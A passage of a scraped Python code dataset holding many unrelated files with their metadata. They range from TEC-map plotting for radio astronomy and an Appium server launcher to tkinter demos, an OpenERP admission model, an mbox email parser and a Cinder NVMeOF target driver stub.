astropy.time import Time\nfrom astropy.coordinates import SkyCoord\nfrom astropy import units as u\n\nimport matplotlib.animation as animation\n\n\nmatplotlib.rcParams.update({'font.size': 14})\nrc('font',**{'family':'serif','serif':['Computer Modern Roman']})\nrc('text', usetex=True)\n\n##############################################################################################\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-v\", \"--verbose\",\n help=\"increase output verbosity\",\n action=\"count\",default=0)\n parser.add_argument('tec_map',\n help='jplg TEC map e.g. jplgDDD0.YYi',\n type=str)\n parser.add_argument('-m','--maser',\n help='Maser number or name e.g. G232.62 or s1',default='G232.62')\n parser.add_argument('-l','--lower',\n help='Lowest TEC to show', type=float,default=-2)\n parser.add_argument('-u','--upper',\n help='Highest TEC to show', type=float,default=40)\n parser.add_argument('-R','--rms',\n help='Do RMS instead of total', action=\"count\",default=0)\n args = parser.parse_args()\n\n '''\n Load in specified TEC map. Only can load in one at a time atm.\n '''\n t, longi, lati, tec, rms = read_jpltec(args.tec_map)\n '''\n Get maser of interest. Defaults to G232.62 aka s1 at the moment.\n '''\n maser = get_maser(args.maser)\n source = SkyCoord(ra=maser.ra,dec=maser.dec,unit=(u.hourangle,u.deg))\n gst = 15*t.sidereal_time('apparent').value\n \n # deletes old animations if they exist (they shouldn't)\n try:\n animate1.event_source.stop()\n except NameError:\n ''\n '''\n Makes basemap of Australia-NZ area. Currently hard-coded.\n '''\n x, y = np.meshgrid(longi, lati)\n fig, ax = plt.subplots(1,figsize=(14,7))\n ax = Basemap(llcrnrlon=70.,llcrnrlat=-66.,urcrnrlon=220.,urcrnrlat=5.,\\\n rsphere=(6378137.00,6356752.3142),\\\n resolution='l',projection='merc',ax=ax)\n ax.drawcoastlines()\n ax.drawstates()\n ax.drawparallels(np.arange(-90,90,10),labels=[1,1,0,1]);\n ax.drawmeridians(np.arange(-180,180,15),labels=[1,1,0,1]);\n '''\n Put antenna locations on map. 
Currently hard-coded for WASCI\n '''\n ant_lat = [-42.804,-31.868,-29.047,-14.375,-36.43]\n ant_lon = [147.440,133.809,115.350,132.150,174.66]\n col = ['g','orange','b','r','y']\n for i in range(len(ant_lat)):\n ax.scatter(ant_lon[i],ant_lat[i],latlon=True,color=col[i],zorder=99)\n '''\n Put on axis objects- 0:TEC colormap, 1:source position, 2:date/time, \n 3:antenna-source LoS (W.I.P) and colorbar (fixed -2 to 40)\n '''\n m = 0\n if args.rms>0:\n plot0 = [ax.pcolor(x,y,rms[:,:,m], latlon=True,cmap='magma',vmin=args.lower,vmax=args.upper)]\n else:\n plot0 = [ax.pcolor(x,y,tec[:,:,m], latlon=True,cmap='magma',vmin=args.lower,vmax=args.upper)]\n\n plot1 = [ax.scatter([source.ra.deg-gst[m]],[source.dec.deg],latlon=True,color='w',s=50,zorder=99)]\n plot2 = [fig.text(0.175,0.15,s=f'{t.iso[m]}',color='w',size=12)]\n plot3 = []\n #for i in range(len(a_lat)):\n # plot3.append(ax.drawgreatcircle(a_lon[i],a_lat[i],\n # source.ra.deg-gst[m],source.dec.deg,color='w',ls='-.',lw=0.25))\n c = plot0[0]\n if args.rms>0: ax.colorbar(c,pad='8%',label=R'$I_e$ (TECU)')\n else: ax.colorbar(c,pad='8%',label=R'$\\delta I_e$ (TECU)')\n '''\n Create animation. \n '''\n if args.rms>0:\n animate1 = animation.FuncAnimation(fig, update, range(tec.shape[2]), \n fargs=(t,gst,source,x,y,rms,plot0,plot1,plot2,plot3,fig,ax,args),interval=500)\n else:\n animate1 = animation.FuncAnimation(fig, update, range(tec.shape[2]), \n fargs=(t,gst,source,x,y,tec,plot0,plot1,plot2,plot3,fig,ax,args),interval=500) \n plt.show()\n\n##############################################################################################\n\ndef get_file(path):\n #opens and external file and makes it into a list\n fopen = path\n f=open(fopen, 'r+')\n g=list(f)\n g=map(lambda s: s.strip(), g)\n return np.array(list(g))\n\ndef splitt(old_list):\n #splits the list entries into sublists\n new_list=[]\n for i in old_list:\n new_list+=[i.split()]\n return new_list\n\nclass Maser:\n kind = 'maser' \n def __init__(self, name, ra, dec, vel, flux, alias):\n self.name = name \n self.ra = ra\n self.dec = dec\n self.vel = float(vel)\n self.cflux = float(flux)\n self.alias = alias\n\ndef get_maser(template):\n masers = np.array([\n ['G232.620+0.996','07:32:09.79','-16:58:12.4', 22.9, 11.5,'s1' ],\n ['G287.371+0.644','10:48:04.44','-58:27:01.0', -1.9, 21.9,'s3' ],\n ['G309.921+0.479','13:50:41.78','-61:35:10.2',-57.9, 57.6,'s4' ],\n ['G323.740-0.263','15:31:45.45','-56:30:50.1',-50.4,346.6,'s5' ],\n ['G327.402+0.445','15:49:19.50','-53:45:13.9',-82.9, 37.7,'s6' ],\n ['G328.254-0.532','15:57:59.75','-53:58:00.4',-36.8, 20.9,'s7' ],\n ['G328.808+0.633','15:55:48.45','-52:43:06.6',-44.4, 30.6,'s8' ],\n ['G339.622-0.121','16:46:05.99','-45:36:43.3',-33.2, 23.3,'s9' ],\n ['G339.884-1.259','16:52:04.67','-46:08:34.2',-35.6,424.1,'s10'],\n ['G345.505+0.348','17:04:22.91','-40:44:21.7',-14.1, 24.5,'s11'],\n ['G291.274-0.709','11:11:53.35','-61:18:23.7',-30.7, 10.7,'s14'],\n ['G299.772-0.005','12:23:48.97','-62:42:25.3', -6.7, 12.3,'s15'],\n ['G318.948-0.196','15:00:55.40','-58:58:52.1',-36.3, 12.5,'s16'],\n ['G326.475+0.703','15:43:16.64','-54:07:14.6',-38.4, 13.5,'s17'],\n ['G328.237-0.547','15:57:58.28','-53:59:22.7',-44.7, 41.9,'s18'],\n ['G329.029-0.205','16:00:31.80','-53:12:49.6',-36.1, 11.1,'s19'],\n ['G332.295+2.280','16:05:41.72','-49:11:30.3',-23.7, 10.5,'s20'],\n ['G337.920-0.456','16:41:06.05','-47:07:02.5',-38.6, 12.7,'s21'],\n ['G345.010+1.792','16:56:47.58','-40:14:25.8',-17.0, 14.2,'s22'],\n ['G348.550-0.979','17:19:20.41','-39:03:51.6',-10.4, 10.5,'s23'],\n 
['G352.630-1.067','17:31:13.91','-35:44:08.7', -3.3, 17.6,'s24']])\n try:\n match = difflib.get_close_matches(template, masers[:,0])[0]\n index = masers[:,0]==match\n return Maser(*masers[index,:][0])\n except IndexError:\n try: \n match = difflib.get_close_matches(template, masers[:,-1])[0]\n index = masers[:,-1]==match\n return Maser(*masers[index,:][0])\n except IndexError:\n print('Cannot identify maser, defaulting to G232.62')\n return Maser(*masers[0,:])\n\ndef update(m,t,gst,source,x,y,mapp,plot0,plot1,plot2,plot3,fig,ax,args):\n plot0[0].remove()\n plot0[0] = ax.pcolor(x,y,mapp[:,:,m], latlon=True,cmap='magma',vmin=args.lower,vmax=args.upper)\n plot1[0].remove()\n plot1[0] = ax.scatter([source.ra.deg-gst[m]],[source.dec.deg],latlon=True,color='w',s=50,zorder=99)\n plot2[0].remove()\n plot2[0] = fig.text(0.175,0.15,s=f'{t.iso[m]}',color='w',size=12)\n #for ln in plot3: ln[0].remove()\n #for i in range(len(a_lat)):\n # plot3.append(ax.drawgreatcircle(a_lon[i],a_lat[i],\n # source.ra.deg-gst[m],source.dec.deg,color='w',ls='-.',lw=0.25))\n\n\ndef read_jpltec(tec_loc):\n tecfile = get_file(tec_loc)\n start = [s for s in tecfile if 'HEADER' in s][0]\n tecends = [s for s in tecfile if 'END OF TEC MAP' in s]\n rmsends = [s for s in tecfile if 'END OF RMS MAP' in s]\n header = tecfile[:np.where(tecfile==start)[0][0]-1]\n data = tecfile[ np.where(tecfile==start)[0][0]+1:np.where(tecfile==tecends[-1])[0][0]]\n rdat = tecfile[ np.where(tecfile==tecends[-1])[0][0]+1:np.where(tecfile==rmsends[-1])[0][0]]\n\n # read tec map\n tecstart = np.array([np.where(data==s)[0][0] for s in data if 'START OF TEC MAP' in s])\n lat = []\n for m in range(len(tecstart)):\n tmap = data[tecstart[m]+1:tecstart[m]+428]\n\n # read rms map\n rmsstart = np.array([np.where(rdat==s)[0][0] for s in rdat if 'START OF RMS MAP' in s])\n for m in range(len(rmsstart)):\n rmap = data[rmsstart[m]+1:rmsstart[m]+428]\n\n t, lat, long = [], np.arange(87.5,-87.6,-2.5), np.arange(-180,180.1,5)\n tec = np.zeros(shape=(len(lat),len(long),12))\n rms = np.zeros(shape=(len(lat),len(long),12))\n for m in range(12):\n # format tec map\n tmap = data[tecstart[m]+1:tecstart[m]+428]\n time_string = tmap[0].split()\n map_t = datetime.datetime(year=int(time_string[0]),month=int(time_string[1]),day=int(time_string[2]),\n hour=int(time_string[3]),minute=int(time_string[4]),second=int(time_string[5]))\n latstart = np.array([np.where(tmap==s)[0][0] for s in tmap if 'LAT/LON1/LON2/DLON/H' in s])\n for n in range(len(lat)):\n tec[n,:,m] = np.array([s for d in splitt(tmap[latstart[n]+1:latstart[n]+6]) for s in d],dtype='float')\n ####################################################\n rmap = rdat[rmsstart[m]+1:rmsstart[m]+428]\n rlatstar = np.array([np.where(rmap==s)[0][0] for s in rmap if 'LAT/LON1/LON2/DLON/H' in s])\n for n in range(len(lat)):\n rms[n,:,m] = np.array([s for d in splitt(rmap[rlatstar[n]+1:rlatstar[n]+6]) for s in d],dtype='float')\n t.append(map_t)\n return Time(t,location=('0d', '0d')), long, lat, tec*0.1, rms*0.1\n\n##############################################################################################\n\nif __name__=='__main__':\n main()\n\n##############################################################################################\n\n","sub_path":"testing/plot_jpltec.py","file_name":"plot_jpltec.py","file_ext":"py","file_size_in_byte":10131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"18359845","text":"import subprocess\nimport multiprocessing\nfrom time import 
ctime\n\ndef appium_start(host,port):\n    bootstrap_port = port + 2\n    # the flags need surrounding spaces, otherwise the command collapses to \"-p4723-bp4725\"\n    cmd = \"start /b appium -p \" + str(port) + \" -bp \" + str(bootstrap_port)\n\n    print(\"%s at %s\" % (cmd, ctime()))\n    subprocess.Popen(cmd,shell=True,stdout=open(\"./appium_log/prot\"+str(port)+\".log\",\"a\"),stderr=subprocess.STDOUT)\n\n\nappium_process=[]\nhost=\"127.0.0.1\"\nport=4723\nfor i in range(2):\n    # start the process\n    process=multiprocessing.Process(target=appium_start,args=(host,port+2*i))\n    # add the process to the process group\n    appium_process.append(process)\n\nif __name__ == '__main__':\n    for p in appium_process:\n        p.start()\n    for p in appium_process:\n        p.join()\n","sub_path":"appium_sync/multi_appium_sync.py","file_name":"multi_appium_sync.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"38832728","text":"from datetime import datetime\nimport random\nimport string\n\nfrom django.test import TestCase\n\nfrom corehq.apps.commtrack.models import NewStockReport\n\nfrom casexml.apps.stock.const import REPORT_TYPE_BALANCE\nfrom casexml.apps.stock.models import StockReport\nfrom couchforms.models import XFormInstance\n\n\nDOMAIN_MAX_LENGTH = 25\n\n\nclass StockReportDomainTest(TestCase):\n    def _get_name_for_domain(self):\n        return ''.join(\n            random.choice(string.ascii_lowercase)\n            for _ in range(DOMAIN_MAX_LENGTH)\n        )\n\n    def setUp(self):\n        self.domain = self._get_name_for_domain()\n        self.form = XFormInstance(domain=self.domain)\n        self.form.save()\n        self.new_stock_report = NewStockReport(\n            self.form,\n            datetime.now(),\n            REPORT_TYPE_BALANCE,\n            [],\n        )\n\n    def tearDown(self):\n        self.form.delete()\n        StockReport.objects.all().delete()\n\n    def test_stock_report(self):\n        self.new_stock_report.create_models()\n        filtered_stock_report = StockReport.objects.filter(domain=self.domain)\n        self.assertEquals(filtered_stock_report.count(), 1)\n        stock_report = filtered_stock_report.get()\n        self.assertEquals(stock_report.form_id, self.form._id)\n        self.assertEquals(stock_report.domain, self.domain)\n","sub_path":"corehq/apps/commtrack/tests/test_stock_report.py","file_name":"test_stock_report.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"131750110","text":"# script to store normalized percentage change (percentage change / max percentage change over 2 years) of S&P 500 index for each day\n\nimport csv\nfile_data=[]\nmax=0.0\nmin=0.0\nwith open('../Data/GSPC_RAW_change_1.csv','r') as csv_file:\n    csv_reader = csv.reader(csv_file, delimiter = ',')\n    for row in csv_reader:\n        if(float(row[5])>0.0):\n            if(float(row[5])>max):\n                max=float(row[5])\n        if(float(row[5])<0.0):\n            if(float(row[5])<min):\n                min=float(row[5])\n        file_data.append(row)\n\nfor i in range(0, len(file_data)):\n    if(float(file_data[i][5])>0.0):\n        file_data[i][6] = float(file_data[i][5]) / max\n    else:\n        file_data[i][6] = float(file_data[i][5]) / min\n\n# print(file_data)\n\nwith open('../Data/GSPC_RAW_change_1.csv','w') as csv_file:\n    csv_writer = csv.writer(csv_file, delimiter = ',')\n    csv_writer.writerows(file_data)\n\ncsv_file.close()","sub_path":"src/script2.py","file_name":"script2.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"623520633","text":"import tkinter as tk\nfrom tkinter.messagebox import *\n\nroot = tk.Tk()\nlb = tk.Listbox(root)\nsl = tk.Scrollbar(root)\nsl.pack(side = 'right', expand = 'yes', fill = 'y')\nlb['yscrollcommand'] = sl.set\nfor i in range(100):\n    lb.insert('end', str(i))\nlb.pack(side = 'left', expand = 
'yes')\nsl['command'] = lb.yview\nroot.mainloop()","sub_path":"python/Python review/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"19782245","text":"N = int(input(''))\ncycle = 0\nnew = N\nwhile True:\n    a = new//10\n    b = new % 10\n    c = (a+b) % 10\n    new = 10 * b + c\n    cycle += 1\n    if new == N:\n        break\nprint(cycle)\n\n\n\n","sub_path":"백준 문제 풀이/1110.py","file_name":"1110.py","file_ext":"py","file_size_in_byte":184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"537698838","text":"from tkinter import *\nfrom tkinter import ttk\n\nwindow = Tk()\nframe_app = Frame(window, width=400, height=600, bg=\"red\")\nframe_app.pack()\n\n# Widgets inside the APP container\nframe_navbar = Frame(frame_app, width=400, height=100)\nframe_navbar.grid(row=0, column=0)\nframe_title = Frame(frame_app, width=400, height=150)\nframe_title.grid(row=1, column=0)\nframe_options = Frame(frame_app, width=400, height=500)\nframe_options.grid(row=2, column=0)\n\n# Widgets inside the OPTIONS container\nframe_food = Frame(frame_options, width=350, height=350, bg=\"#d48df0\")\nframe_food.place(x=25, y=30)\n# frame_drinks = Frame(frame_options, width=350, height=200, bg=\"#eba2a2\")\n# frame_drinks.place(x=25, y=380)\nlabel_food = Label(frame_food,\n                   text=\"Comida\",\n                   font=(\"Calibri\", \"22\", \"bold\"),\n                   fg=\"white\",\n                   bg=\"#d48df0\")\nlabel_food.place(x=20, y=290)\ndef formulario():\n    Label(frame_food, text=\"SE HA ENVIADO TU FORMULARIO\", bg=\"red\").grid(row=4, column=0)\n\nnombre = Label(frame_food, text=\"NOMBRE:\", bg=\"pink\")\nnombre.grid(row=0, column=0)\n\nn = Entry(frame_food, width=50)\nn.grid(row=1,column=0)\n\ncuenta = Label(frame_food, text=\"CORREO:\",bg=\"pink\")\ncuenta.grid(row=2,column=0)\n\nc = Entry(frame_food, width=50)\nc.grid(row=3,column=0)\n\ngrado = Label(frame_food, text=\"CONTRASEÑA:\", bg=\"pink\")\ngrado.grid(row=4,column=0)\n\ng = Entry(frame_food, width=50)\ng.grid(row=5, column=0)\n\nboton_enviar = Button(frame_food, text=\"ENVIAR\", bg=\"gray\", command=formulario)\nboton_enviar.grid(row=6, column=0)\n\n# Widgets inside the NAVBAR container\ntitle = Label(frame_navbar,\n              text=\"Menú\",\n              font=(\"Calibri\", \"14\"))\ntitle.place(x=320, y=40)\n\n# Widgets inside the TITLE container\ntitle1 = Label(frame_title,\n               text=\"¡Bienvenido(a)!\",\n               font=(\"Calibri\", \"22\", \"bold\"),\n               justify=LEFT)\ntitle1.place(x=25, y=10)\ntitle2 = Label(frame_title,\n               text=\"¿Quieres ser parte de nuestra \\ncomunidad?\",\n               font=(\"Calibri\", \"18\"),\n               justify=LEFT)\ntitle2.place(x=25, y=50)\n\nwindow.mainloop()\n","sub_path":"register_form (1).py","file_name":"register_form (1).py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"587178154","text":"#!/bin/python\n\n\nfrom ..readOif import readOif\nfrom ..PPreadColoursUser import PPreadColoursUser\n\n\ndef test_PPreadColoursUser():\n    \n    resval=0.6\n    \n    padain=readOif('./data/test/oiftestoutput')\n    padafr=PPreadColoursUser(padain, 'r-X', 0.6, 0.0)\n    \n    val=padafr.at[0,'r-X']\n    \n    assert 
resval==val","sub_path":"modules/tests/test_PPreadColoursUser.py","file_name":"test_PPreadColoursUser.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"190261758","text":"from random import randint\r\n\r\n\r\ndef get_words():\r\n    with open('words.txt', 'r') as dictionary:\r\n        # str.strip() returns a new string, so strip each line as the list is built\r\n        words = [line.strip() for line in dictionary.readlines()]\r\n    word = words[randint(0, len(words) - 1)]\r\n    return word\r\n\r\n\r\nprint(get_words())\r\n","sub_path":"30.py","file_name":"30.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"427329658","text":"from openerp.osv import fields,osv\nfrom openerp import tools\n\nclass op_parent_admission(osv.osv):\n    _name = 'op.parent.admission' # BEHAVIOR PROFILE\n    # the following are the table columns\n    _columns = {\n        'parent_id': fields.many2one('op.admission','Admision'), # admission id\n        'parent_type': fields.selection([('Padre','Padre'),('Madre','Madre')], string='Parentesco'),\n\n        'name': fields.char(size=128, string='Nombre'),\n        'marital_status': fields.char(size=128, string='Estado Civil'),\n        'grade': fields.char(size=128, string='Grado maximo de estudios'),\n        'ocupation': fields.char(size=128, string='Ocupacion'),\n        'company': fields.char(size=128, string='Compania'),\n        'company_ubication': fields.char(size=128, string='Ubicacion de la Compania'),\n        'job': fields.char(size=128, string='Puesto que ocupa'),\n        'department': fields.char(size=128, string='Departamento'),\n        'schedule': fields.char(size=128, string='Horario de Trabajo'),\n        'rfc': fields.char(size=15, string='RFC'),\n        'house': fields.selection([('Si','Si'),('No','No')], string='Tiene casa propia?'),\n        'rent': fields.char(size=128, string='Monto de la renta'),\n        'car': fields.selection([('Si','Si'),('No','No')], string='Tiene automovil?'),\n        'brand_car': fields.char(size=128, string='Marca'),\n        'model_car': fields.char(size=128, string='Modelo'),\n        'monthly_income': fields.float( string='Ingreso Mensual'),\n        'email': fields.char(size=128, string='Email'),\n        'student': fields.selection([('Si','Si'),('No','No')], string='Es ex-alumno?'),\n        'generation': fields.char(size=128, string='Generacion'),\n        'mobile': fields.char(size=16, string='Cel'),\n        # address\n        'street': fields.char(size=256, string='Calle'),\n        'street2': fields.char(size=256, string='Colonia'),\n        'numero': fields.char(size=256, string='Numero Ext'),\n        'interior': fields.char(size=256, string='Numero Int'),\n        'zip': fields.char(size=8, string='CP'),\n        'state_id': fields.many2one('res.country.state', string='Estado'),\n        'phone': fields.char(size=16, string='Telefono'),\n        'city': fields.many2one('res.country.state.city', string='Ciudad'),\n        'country_id': fields.many2one('res.country', string='Pais'),\n\n        'apoderado_admin':fields.boolean('Apoderado Administrativo'),\n        'apoderado_acad':fields.boolean('Apoderado Academico'),\n        'active':fields.boolean('Activo'),\n        'beca': fields.many2one('product.pricelist', string='Beca'), # REPLACE WITH PRICE LIST\n        'datos_beca':fields.char('Datos Beca',size=120),\n        'autorizado':fields.char('Autorizo',size=120),\n        'exist_father': fields.many2one('res.partner','Padre'), # which parent it is\n        'check_exist_father': fields.boolean('Padre Existente'),\n        'invoice_taxation': fields.many2one('regimen.fiscal', string='Regimen Fiscal'),\n\n    }\n    _defaults={\n\n\n        'active': True,\n    
}\nop_parent_admission()\n","sub_path":"openeducat_erp/op_admission/op_parent_admission.py","file_name":"op_parent_admission.py","file_ext":"py","file_size_in_byte":3605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"384471316","text":"import os\nimport email\nfrom email.utils import *\nimport mailbox\nimport string\nimport time\nimport re\nfrom dateutil.parser import *\n\ndef addField(name,mail,msg):\n\ttmp = msg.get(name)\n\tif not tmp is None:\n\t\tmail[name] = tmp.strip()#strip whitespace\n\telse :\n\t\tmail[name] = \"Null\"\n\n\n\n\ndef addMultiIdField(name,mail,msg):\n\n\ttmp = msg.get(name)#pull data\n\n\n\tif not tmp is None and tmp != \"\": #see if anyting was pulled\n\n\t\tmail[name] = tmp\n\n\t\ttmp = msg.get_all(name)\n\n\t\tfor value in tmp:\n\n\t\t\tids = re.split(' |,|\\t|\\n|\\r',value)\n\n\t\t\tout = list()\n\n\t\t\tfor x in ids:\n\n\t\t\t\ta = x.split(\"><\")\n\n\t\t\t\tif len(a) > 1:\n\t\t\t\t\tout.append(a[0] + \">\")\n\t\t\t\t\tout.append(\"<\" + a[-1])\n\n\t\t\t\t\tfor y in a[1:][:-1]:\n\t\t\t\t\t\tout.append(\"<\" + y + \">\")\n\n\t\t\t\telse:\n\t\t\t\t\tout.append(x)\n\n\n\n\t\t\tfinal = list()\n\n\t\t\tfor x in out:\n\t\t\t\tif \"@\" in x:\n\t\t\t\t\tfinal.append(x)\n\t\t\t\telif len(x) > 1 and x[0] == \"<\" and x[-1] == \">\":\n\t\t\t\t\tfinal.append(x)\n\n\t\t\t\t\t#print(\"\\n\")\n\t\t\t\t\t#print(mail[name])\n\t\t\t\t\t#print(x)\n\n\n\t\t\tif len(final) > 0:\n\t\t\t\tmail[name + \"-ID\"] = final\n\t\t\telse:\n\t\t\t\tmail[name + \"-ID\"] = [\"Null\"]\n\n\t\t\t\t#print(\"\\n\")\n\t\t\t\t#print(mail[name])\n\t\t\t\t#print(out)\n\t\t\t\t#print(final)\n\n\telse:\t#if nothing was pulled, set to null\n\n\t\tmail[name] = \"Null\"\n\t\tmail[name + \"-ID\"] = [\"Null\"]\n\n\n\n\n\n\n\ndef addAddressField(name,mail,msg):\n\ttmp = msg.get(name)\n\n\tif not tmp is None and tmp != \"\":\n\n\t\tmail[name] = tmp\n\n\t\ttmp = msg.get_all(name, [])\n\t\ttmp = getaddresses(tmp)\n\n\t\ti = 0\n\n\t\ttmp_name = []\n\t\ttmp_address = []\n\n\n\t\twhile i < len(tmp) :\n\n\t\t\tif tmp[i][0] != '' : #check if name was extracted\n\t\t\t\ttmp_name.append(tmp[i][0])\n\n\n\t\t\tif tmp[i][1] != '' : #check if address was extracted\n\t\t\t\ttmp_address.append(tmp[i][1])\n\n\n\t\t\ti = i + 1\n\n\t\tif not tmp_name: #if empty then add null\n\t\t\ttmp_name.append(\"Null\")\n\n\t\tif not tmp_address : #if empty then add null\n\t\t\ttmp_address.append(\"Null\")\n\n\n\t\tmail[name + \"-name\"] = tmp_name\n\t\tmail[name + \"-address\"] = tmp_address\n\n\telse :\n\t\tmail[name] = \"Null\"\n\t\tmail[name + \"-name\"] = [\"Null\"]\n\t\tmail[name + \"-address\"] = [\"Null\"]\n\ndef printmail(inn):\n\tprint(\"\\n\")\n\tfor key, value in inn.items():\n\t\tprint(key, ':', value)\n\n\tprint(\"\\n\\n\\n\")\n\ndef parseDate(a):\n\n\ttry :\n\t\treturn time.strftime(\"%Y-%m-%dT%H:%M:%S\",parsedate(a))\n\texcept :\n\t\treturn \"1900-01-01T0001:00\"\n\n\ndef getTimezone(a):\n\ta = a.split(\" \")\n\treturn a[len(a)-1]\n\ndef parsefile(fileinn,mailing_list) :\n\n\t#print(fileinn)\n\n\n\tbox = mailbox.mbox(fileinn)\n\n\titer = box.iterkeys()\n\n\tout = []\n\n\tfor key in iter :\n\n\t\tmsg = box.get_message(key)\n\n\t\tmail = {}\n\t\t#Aaccording to rfc4021\n\t\t#https://tools.ietf.org/html/rfc4021#section-2.1\n\n\n\t\t#set these so they show up in solr\n\n\t\ttmp = msg.get(\"Date\")\n\t\tif not tmp is None:\n\n\n\t\t\tmail[\"Date\"] = parseDate(tmp)\n\t\t\tmail[\"Date-raw\"] = tmp\n\t\t\tmail[\"Timezone\"] = getTimezone(tmp)\n\n\n\n\t\telse 
:\n\n\t\t\tmail[\"Date\"] = \"1900-01-01T0001:00\"\n\t\t\tmail[\"Date-raw\"] = \"Null\"\n\t\t\tmail[\"Timezone\"] = -9999\n\n\n\n\t\taddAddressField(\"From\",mail,msg)\n\n\t\taddAddressField(\"Sender\",mail,msg)\n\n\t\taddAddressField(\"Reply-to\",mail,msg)\n\n\t\taddAddressField(\"To\",mail,msg)\n\n\t\taddAddressField(\"Cc\",mail,msg)\n\n\t\taddAddressField(\"Bcc\",mail,msg)\n\n\t\taddField(\"Message-ID\",mail,msg)\n\n\t\taddMultiIdField(\"In-Reply-To\",mail,msg)\n\n\t\taddMultiIdField(\"References\",mail,msg)\n\n\t\taddField(\"Comments\",mail,msg)\n\n\t\taddField(\"Subject\",mail,msg)\n\n\t\t#print(mail[\"Message-ID\"])\n\t\t#print(mail[\"In-Reply-To\"])\n\n\t\tmail[\"Mailing-list\"] = mailing_list\n\t\tmail[\"File-location\"] = fileinn\n\n\n\t\tif not msg.is_multipart() : #This means that we are dealing with a regular text mail, no fancy parsing\n\t\t\t#print(box.get_message(key).get_payload())\n\n\n\t\t\tmail[\"Content\"] = box.get_message(key).get_payload()\n\n\t\t\t#print(mail[\"Content\"])\n\t\t\tout.append(mail)\n\t\t\t#print(\"---------------STR MSG---------------\")\n\n\t\telse : #probably MIME mail parsing\n\n\t\t\tmail[\"Content\"] = \"\"\n\t\t\tfor part in msg.walk():\n\t\t\t\tif part.get_content_type() == \"text/plain\":\n\t\t\t\t\tmail[\"Content\"] += part.get_payload()\n\t\t\t#print(mime_mail[\"Content\"])\n\t\t\tout.append(mail)\n\t\t\t#print(\"---------------MIME MSG---------------\")\n\t\t#=============================================================================\n\n\t\t#printmail(mail)\n\n\t\t#exit(0) #------------------------\n\n\n\t#print(\"Date = \" + out[0][\"Date\"])\n\t#print(\"From = \" + out[0][\"From\"])\n\t#print(\"Sender = \" + out[0][\"Sender\"])\n\t#print(\"Reply-to = \" + out[0][\"Reply-to\"])\n\t#print(\"Subject = \" + out[0][\"Subject\"])\n\t#print(\"Maling-list = \" + out[0][\"Mailing-list\"])\n\t#print(\"File-location = \" + out[0][\"File-location\"])\n\n\treturn out;\n","sub_path":"Raw repo/code/parser/mailparser.py","file_name":"mailparser.py","file_ext":"py","file_size_in_byte":4433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"197643904","text":"# coding=utf-8\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport wrapt\n\nfrom scout_apm.core.tracked_request import TrackedRequest\n\n\n@wrapt.decorator\nasync def wrapped_render_async(wrapped, instance, args, kwargs):\n tracked_request = TrackedRequest.instance()\n span = tracked_request.start_span(operation=\"Template/Render\")\n span.tag(\"name\", instance.name)\n try:\n return await wrapped(*args, **kwargs)\n finally:\n tracked_request.stop_span()\n","sub_path":"src/scout_apm/async_/instruments/jinja2.py","file_name":"jinja2.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"466125313","text":"def _gorner(coeffs: list, point)->list:\n# inverted_coeffs = coeffs * (-1) if coeffs[0] < 0\n gorner_coeffs = [0] * len(coeffs)\n for i in range(0, len(gorner_coeffs)):\n gorner_coeffs[i] = gorner_coeffs[i-1]*point+coeffs[i]\n return gorner_coeffs\n\ndef upper_border(coeffs):\n start_point = delta = 1\n while True:\n result = _gorner(coeffs, start_point)\n if result[0] >= 0 and all(map(lambda x: x > 0, result)):\n return start_point\n start_point += delta\n\n\ndef lower_border(coeffs):\n transformed_coeffs = [((-1)**i)*coeff for i, coeff in enumerate(coeffs)]\n start_point = delta = 1\n while True:\n result = 
_gorner(transformed_coeffs, start_point)\n if result[0] >= 0 and all(map(lambda x: x > 0, result)):\n return -start_point\n start_point += delta\n","sub_path":"l1/gorner.py","file_name":"gorner.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"385486322","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport abc\n\nfrom oslo_log import log as logging\n\nfrom cinder import exception\nfrom cinder.i18n import _\nfrom cinder.volume.targets import driver\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass UnsupportedNVMETProtocol(exception.Invalid):\n message = _(\"An invalid 'target_protocol' \"\n \"value was provided: %(protocol)s\")\n\n\nclass NVMeOF(driver.Target):\n\n \"\"\"Target object for block storage devices with RDMA transport.\"\"\"\n\n protocol = 'nvmeof'\n target_protocol_map = {\n 'nvmet_rdma': 'rdma',\n }\n\n def __init__(self, *args, **kwargs):\n \"\"\"Reads NVMeOF configurations.\"\"\"\n\n super(NVMeOF, self).__init__(*args, **kwargs)\n 